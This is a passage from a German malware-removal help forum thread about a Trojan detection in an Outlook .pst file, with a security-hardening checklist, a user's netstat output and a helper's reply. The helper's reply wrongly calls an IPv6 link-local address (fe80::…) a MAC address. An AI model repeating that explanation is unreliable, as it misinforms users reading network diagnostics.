    Um deine Installierte Software up to date zu halten, empfehle ich dir Secunia Online Software.


Anti- Viren Software
  • Gehe sicher immer eine Anti Viren Software installiert zu haben und das diese auch up to date ist. Es ist nämlich nutzlos wenn diese out of date sind.


Zusätzlicher Schutz
  • MalwareBytes Anti Malware
    Dies ist eines der besten Anti-Malware Tools auf dem Markt. Es ist ein On- Demond Scan Tool welches viele aktuelle Malware erkennt und auch entfernt.
    Update das Tool und lass es einmal in der Woche laufen. Die Kaufversion biete zudem noch einen Hintergrundwächter.
    Ein Tutorial zur Verwendung findest Du hier.
  • WinPatrol
    Diese Software macht einen Snapshot deines Systems und warnt dich vor eventuellen Änderungen. Downloade dir die Freeware Version von hier.


Sicheres Browsen
  • SpywareBlaster
    Eine kurze Einführung findest du Hier
  • MVPs hosts file
    Ein Tutorial findest Du hier. Leider habe ich bis jetzt kein deutschsprachiges gefunden.
  • WOT (Web of trust)
    Dieses AddOn warnt Dich bevor Du eine als schädlich gemeldete Seite besuchst.


Alternative Browser

Andere Browser tendieren zu etwas mehr Sicherheit als der IE, da diese keine Active X Elemente verwenden. Diese können von Spyware zur Infektion deines Systems missbraucht werden.
  • Opera
  • Mozilla Firefox.
    • Hinweis: Für diesen Browser habe ich hier ein paar nützliche Add Ons
    • NoScript
      Dieses AddOn blockt JavaScript, Java and Flash und andere Plugins. Sie werden nur dann ausgeführt wenn Du es bestätigst.
    • AdblockPlus
      Dieses AddOn blockt die meisten Werbung von selbst. Ein Rechtsklick auf den Banner um diesen zu AdBlockPlus hinzu zu fügen reicht und dieser wird nicht mehr geladen.
      Es spart ausserdem Downloadkapazität.

Performance
Bereinige regelmäßig deine Temp Files. Ich empfehle hierzu TFC
Halte dich fern von jedlichen Registry Cleanern.
Diese Schaden deinem System mehr als sie helfen. Hier ein paar ( englishe ) Links
Miekemoes Blogspot ( MVP )
Bill Castner ( MVP )



Don'ts
  • Klicke nicht auf alles nur weil es Dich dazu auffordert und schön bunt ist.
  • verwende keine peer to peer oder Filesharing Software (Emule, uTorrent,..)
  • Lass die Finger von Cracks, Keygens, Serials oder anderer illegaler Software.
  • Öffne keine Anhänge von Dir nicht bekannten Emails. Achte vor allem auf die Dateiendung wie zb deinFoto.jpg.exe
Nun bleibt mir nur noch dir viel Spass beim sicheren Surfen zu wünschen.

Hinweis: Bitte gib mir eine kurze Rückmeldung wenn alles erledigt ist und keine Fragen mehr vorhanden sind, so das ich diesen Thread aus meinen Abos löschen kann.
__________________
gruß,
schrauber

Proud Member of UNITE and ASAP since 2009

Spenden
Anleitungen und Hilfestellungen
Trojaner-Board Facebook-Seite

Keine Hilfestellung via PM!

Alt 20.01.2014, 08:17   #9
franz12
 
TR/Crypt.Xpack.41536 in der Outlook .pst - Standard

TR/Crypt.Xpack.41536 in der Outlook .pst



Vielen Dank! Ist alles erfolgreich erledigt. Wunderbar!!!

Alt 21.01.2014, 09:25   #10
schrauber
/// the machine
/// TB-Ausbilder
 

TR/Crypt.Xpack.41536 in der Outlook .pst - Standard

TR/Crypt.Xpack.41536 in der Outlook .pst



Gern Geschehen
__________________
gruß,
schrauber

Proud Member of UNITE and ASAP since 2009

Spenden
Anleitungen und Hilfestellungen
Trojaner-Board Facebook-Seite

Keine Hilfestellung via PM!

Alt 22.01.2014, 08:30   #11
franz12
 
TR/Crypt.Xpack.41536 in der Outlook .pst - Standard

TR/Crypt.Xpack.41536 in der Outlook .pst



Hallo nochmal!
Ich habe mich in das Thema etwas mehr eingelesen und die Tipps zur Absicherung gemacht. Bitte könnt ihr euch noch dieses netstat, btw. netstat -b ansehen? Mir ist nicht klar, was die Zeilen mit "[fe80::d93b:b9e0" hier bedeuten. Werden von Malwarebytes bzw. den anderen Tools diese Ports und die Orte, bzw. Dateigrößen der Programme auch geprüft? Vielen Dank!

Code:
ATTFilter
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. Alle Rechte vorbehalten.

C:\Windows\system32>netstat -b

Aktive Verbindungen

  Proto  Lokale Adresse         Remoteadresse          Status
  TCP    127.0.0.1:19872        *****-PC:49907        HERGESTELLT
 [Dropbox.exe]
  TCP    127.0.0.1:27015        *****-PC:49889        HERGESTELLT
 [AppleMobileDeviceService.exe]
  TCP    127.0.0.1:49162        *****-PC:50701        HERGESTELLT
 [VersionCueCS2.exe]
  TCP    127.0.0.1:49889        *****-PC:27015        HERGESTELLT
 [iTunesHelper.exe]
  TCP    127.0.0.1:49907        *****-PC:19872        HERGESTELLT
 [Dropbox.exe]
  TCP    127.0.0.1:50701        *****-PC:49162        HERGESTELLT
 [mysqld-nt.exe]
  TCP    127.0.0.1:56423        *****-PC:2559         SYN_GESENDET
 [nvtray.exe]
  TCP    192.168.178.66:49933   snt-re2-10c:http       HERGESTELLT
 [Dropbox.exe]
  TCP    [::1]:49157            *****-PC:49159        HERGESTELLT
 [LMS.exe]
  TCP    [::1]:49159            *****-PC:49157        HERGESTELLT
 [LMS.exe]
  TCP    [fe80::d93b:b9e0:44c4:57a0%20]:56232  *****-PC:16992        WARTEND
  TCP    [fe80::d93b:b9e0:44c4:57a0%20]:56248  *****-PC:16992        WARTEND
  TCP    [fe80::d93b:b9e0:44c4:57a0%20]:56264  *****-PC:16992        WARTEND
  TCP    [fe80::d93b:b9e0:44c4:57a0%20]:56280  *****-PC:16992        WARTEND
  TCP    [fe80::d93b:b9e0:44c4:57a0%20]:56297  *****-PC:16992        WARTEND
  TCP    [fe80::d93b:b9e0:44c4:57a0%20]:56313  *****-PC:16992        WARTEND
  TCP    [fe80::d93b:b9e0:44c4:57a0%20]:56329  *****-PC:16992        WARTEND
  TCP    [fe80::d93b:b9e0:44c4:57a0%20]:56345  *****-PC:16992        WARTEND
  TCP    [fe80::d93b:b9e0:44c4:57a0%20]:56361  *****-PC:16992        WARTEND
  TCP    [fe80::d93b:b9e0:44c4:57a0%20]:56378  *****-PC:16992        WARTEND
  TCP    [fe80::d93b:b9e0:44c4:57a0%20]:56394  *****-PC:16992        WARTEND
  TCP    [fe80::d93b:b9e0:44c4:57a0%20]:56410  *****-PC:16992        WARTEND
  
  C:\Windows\system32>netstat

Aktive Verbindungen

  Proto  Lokale Adresse         Remoteadresse          Status
  TCP    127.0.0.1:19872        *****-PC:49907        HERGESTELLT
  TCP    127.0.0.1:27015        *****-PC:49889        HERGESTELLT
  TCP    127.0.0.1:49162        *****-PC:50701        HERGESTELLT
  TCP    127.0.0.1:49889        *****-PC:27015        HERGESTELLT
  TCP    127.0.0.1:49907        *****-PC:19872        HERGESTELLT
  TCP    127.0.0.1:50701        *****-PC:49162        HERGESTELLT
  TCP    127.0.0.1:56210        *****-PC:2559         SYN_GESENDET
  TCP    192.168.140.1:56209    *****-PC:16993        SYN_GESENDET
  TCP    192.168.178.66:49933   snt-re2-10c:http       HERGESTELLT
  TCP    192.168.178.66:55545   ham02s13-in-f24:https  WARTEND
  TCP    192.168.178.66:55985   muc03s01-in-f15:https  WARTEND
  TCP    192.168.178.66:55988   muc03s07-in-f15:https  WARTEND
  TCP    192.168.178.66:55989   cache:https            WARTEND
  TCP    192.168.178.66:55990   cache:https            WARTEND
  TCP    192.168.178.66:55993   cache:https            WARTEND
  TCP    192.168.178.66:55996   cache:https            WARTEND
  TCP    192.168.178.66:55997   cache:https            WARTEND
  TCP    192.168.178.66:55998   cache:https            WARTEND
  TCP    192.168.178.66:55999   cache:https            WARTEND
  TCP    192.168.178.66:56011   api:http               WARTEND
  TCP    192.168.178.66:56017   ham02s13-in-f24:http   WARTEND
  TCP    192.168.178.66:56018   ham02s13-in-f24:http   WARTEND
  TCP    192.168.178.66:56022   cache:http             WARTEND
  TCP    192.168.178.66:56023   cfdprivileges:http     WARTEND
  TCP    192.168.178.66:56025   cache:http             WARTEND
  TCP    192.168.178.66:56027   mail:http              WARTEND
  TCP    192.168.178.66:56029   mail:http              WARTEND
  TCP    192.168.178.66:56030   mail:http              WARTEND
  TCP    192.168.178.66:56033   malthus:http           WARTEND
  TCP    192.168.178.66:56037   p3nlhg214c1214:http    WARTEND
  TCP    192.168.178.66:56038   p3nlhg214c1214:http    WARTEND
  TCP    [::1]:49157            *****-PC:49159        HERGESTELLT
  TCP    [::1]:49159            *****-PC:49157        HERGESTELLT
  TCP    [fe80::d93b:b9e0:44c4:57a0%20]:55991  *****-PC:16992        WARTEND
  TCP    [fe80::d93b:b9e0:44c4:57a0%20]:56014  *****-PC:16992        WARTEND
  TCP    [fe80::d93b:b9e0:44c4:57a0%20]:56049  *****-PC:16992        WARTEND
  TCP    [fe80::d93b:b9e0:44c4:57a0%20]:56065  *****-PC:16992        WARTEND
  TCP    [fe80::d93b:b9e0:44c4:57a0%20]:56084  *****-PC:16992        WARTEND
  TCP    [fe80::d93b:b9e0:44c4:57a0%20]:56100  *****-PC:16992        WARTEND
  TCP    [fe80::d93b:b9e0:44c4:57a0%20]:56117  *****-PC:16992        WARTEND
  TCP    [fe80::d93b:b9e0:44c4:57a0%20]:56134  *****-PC:16992        WARTEND
  TCP    [fe80::d93b:b9e0:44c4:57a0%20]:56150  *****-PC:16992        WARTEND
  TCP    [fe80::d93b:b9e0:44c4:57a0%20]:56166  *****-PC:16992        WARTEND
  TCP    [fe80::d93b:b9e0:44c4:57a0%20]:56183  *****-PC:16992        WARTEND
  TCP    [fe80::d93b:b9e0:44c4:57a0%20]:56199  *****-PC:16992        WARTEND

C:\Windows\system32>
         

Alt 22.01.2014, 16:40   #12
schrauber
/// the machine
/// TB-Ausbilder
 

TR/Crypt.Xpack.41536 in der Outlook .pst - Standard

TR/Crypt.Xpack.41536 in der Outlook .pst



Zitat:
[fe80::d93b:b9e0:44c4:57a0%20]:55991 *****-PC:16992
den Namen den Du da unkenntlich gemacht hast, das ist der betroffene Rechner der das macht

Zitat:
TCP [fe80::d93b:b9e0:44c4:57a0%20]:55991 *****-PC:16992 WARTEND
Das in Klammern ist die Mac Adresse.
__________________
gruß,
schrauber

Proud Member of UNITE and ASAP since 2009

Spenden
Anleitungen und Hilfestellungen
Trojaner-Board Facebook-Seite

Keine Hilfestellung via PM!

Antwort

Themen zu TR/Crypt.Xpack.41536 in der Outlook .pst
.com, adblock, backdoor.agent.wrrgen, computer, dvdvideosoft ltd., e-mail anhang, flash player, gmer.log, js/trojandownloader.agent.nsa, pup.optional.installcore.a, pup.optional.regcleanerpro, pup.optional.somoto, pup.optional.sweetim, richtlinie, security, sierra, software, spyware, svchost.exe, tr/crypt.xpack.41536, tr/crypt.zpack.gen2, worm/ntech.t




Ähnliche Themen: TR/Crypt.Xpack.41536 in der Outlook .pst


  1. avira findet : tr/crypt.zpack.36522 ,tr/crypt.xpack.gen ,adware/installcore.gen
    Plagegeister aller Art und deren Bekämpfung - 06.01.2014 (4)
  2. AntiVir hat folgede Viren gefunden: TR/Crypt.ZPACK.Gen2' & 'TR/Crypt.XPACK.Gen5' [trojan
    Plagegeister aller Art und deren Bekämpfung - 26.09.2012 (33)
  3. Probleme mit .NET Framework, windows update und Systemwiederherstellung, Trojaner TR/Crypt.XPACK.Gen8, TR/Crypt.ULPM.Gen
    Plagegeister aller Art und deren Bekämpfung - 23.09.2012 (11)
  4. TR/Crypt.EPACK.Gen8, TR/Crypt.XPACK.Gen, TR/Vcaredrix.A.3 und einige EXP/CVE-xx, EXP/2010-xx Viren.
    Plagegeister aller Art und deren Bekämpfung - 26.07.2012 (7)
  5. TR/Crypt.XPACK.Gen, TR/Sirefef.BV.2, TR/Crypt.XPACK.Gen3, TR/PSW.Karagany.A.73
    Plagegeister aller Art und deren Bekämpfung - 15.02.2012 (2)
  6. TR/Crypt.XPACK.Gen5, TR/Crypt.ZPACK.Gen2, TR/Fake.Rean.3394, TR/PSW.Fareit.A.64
    Plagegeister aller Art und deren Bekämpfung - 19.12.2011 (30)
  7. TR/Crypt.XPACK.Gen und TR/Crypt.ZPACK.Gen2 gefunden PC extrem langsam
    Log-Analyse und Auswertung - 19.10.2011 (8)
  8. Kurze Fragen zu TR/Crypt.XPACK.Gen + TR/Crypt.ZPACK.Gen + Avira Scan
    Plagegeister aller Art und deren Bekämpfung - 02.12.2010 (3)
  9. W32/Induc.A, TR/Dropper.Gen, TR/Crypt.ZPACK.Gen, TR/Crypt.XPACK.Gen3 gefunden - wie entfernen
    Plagegeister aller Art und deren Bekämpfung - 01.12.2010 (5)
  10. TR/Crypt.XPACK.Gen3 - nach formatierung von C: TR/Crypt.XPACK.Gen2 gefunden
    Plagegeister aller Art und deren Bekämpfung - 17.10.2010 (9)
  11. TR/Crypt.XPACK.Gen3, TR/Crypt.XPACK.Gen2
    Plagegeister aller Art und deren Bekämpfung - 10.10.2010 (4)
  12. Befall mit TR/Crypt.XPACK.Gen und TR/Crypt.XPACK.Gen3
    Plagegeister aller Art und deren Bekämpfung - 21.09.2010 (23)
  13. TR/Dropper.gen und TR/Crypt.XPACK.Gen und TR/Crypt.XPACK.Gen2 und TR/Dldr.Agent.cxyf.3
    Plagegeister aller Art und deren Bekämpfung - 29.07.2010 (32)
  14. tr\crypt.xpack.gen2 und tr\crypt.xpack.gen
    Plagegeister aller Art und deren Bekämpfung - 29.07.2010 (4)
  15. TR/dldr.swizzor.gen2, TR/crypt.xpack.gen, TR/crypt.zpack.gen unter Windows XP
    Plagegeister aller Art und deren Bekämpfung - 16.06.2010 (15)
  16. Massives Trojaner Problem TR/Crypt.XPACK.Gen TR/dropper.Gen TR/Crypt.ASPM.Gen
    Plagegeister aller Art und deren Bekämpfung - 21.03.2010 (1)
  17. Heftiger Trojaner Befall Crypt.XPACK.Gen/Click.YABECTOR.B.1/ Crypt.PEPM.Gen
    Log-Analyse und Auswertung - 28.12.2009 (1)

Zum Thema TR/Crypt.Xpack.41536 in der Outlook .pst - Hallo! Bei Routine-Scans sind mir ein paar Dinge aufgefallen. Deswegen habe ich den PC mit der aktuellen Avira Rescue CD gebootet und scannen lassen. Dabei sind folgende Viren erkannt und - TR/Crypt.Xpack.41536 in der Outlook .pst...
Archiv
Du betrachtest: TR/Crypt.Xpack.41536 in der Outlook .pst auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.